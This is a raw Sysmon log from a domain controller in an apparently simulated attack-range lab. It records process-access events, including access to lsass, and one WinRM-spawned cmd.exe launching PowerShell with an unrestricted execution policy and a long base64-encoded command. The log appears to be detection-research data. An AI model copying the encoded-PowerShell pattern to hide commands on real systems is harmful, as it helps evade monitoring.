10:39:16.906{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000322Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.906{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000321Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.906{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000320Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.906{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000319Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.906{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000318Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.906{733EE690-3C5B-5F80-0500-000000007E01}6401216C:\Windows\system32\csrss.exe{733EE690-3DD4-5F80-0103-000000007E01}4616C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000317Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.906{733EE690-3DD4-5F80-FF02-000000007E01}43204528C:\Windows\system32\WinrsHost.exe{733EE690-3DD4-5F80-0103-000000007E01}4616C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+7d09|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+b42b|C:\Windows\System32\combase.dll+53b8c|C:\Windows\System32\combase.dll+53842|C:\Windows\System32\combase.dll+51968|C:\Windows\System32\combase.dll+4fedd|C:\Windows\System32\combase.dll+4f5bf|C:\Windows\System32\combase.dll+6da09|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5982e|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb 154100x8000000000000000316Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.913{733EE690-3DD4-5F80-0103-000000007E01}4616C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=C:\Users\Administrator\ATTACKRANGE\Administrator{733EE690-3DD4-5F80-0C83-110000000000}0x11830c0HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{733EE690-3DD4-5F80-FF02-000000007E01}4320C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x8000000000000000315Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.906{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000314Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.906{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000313Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.906{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000312Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.906{733EE690-3C69-5F80-1400-000000007E01}13321612C:\Windows\system32\svchost.exe{733EE690-3DD4-5F80-FF02-000000007E01}4320C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x8000000000000000311Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.890{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD4-5F80-FF02-000000007E01}4320C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000310Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.874{733EE690-3DD4-5F80-0003-000000007E01}43881144C:\Windows\system32\conhost.exe{733EE690-3DD4-5F80-FF02-000000007E01}4320C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000309Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.874{733EE690-3C5B-5F80-0500-000000007E01}6401216C:\Windows\system32\csrss.exe{733EE690-3DD4-5F80-0003-000000007E01}4388C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000308Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.874{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000307Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.874{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000306Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.874{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000305Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.874{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000304Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.874{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000303Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.874{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000302Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 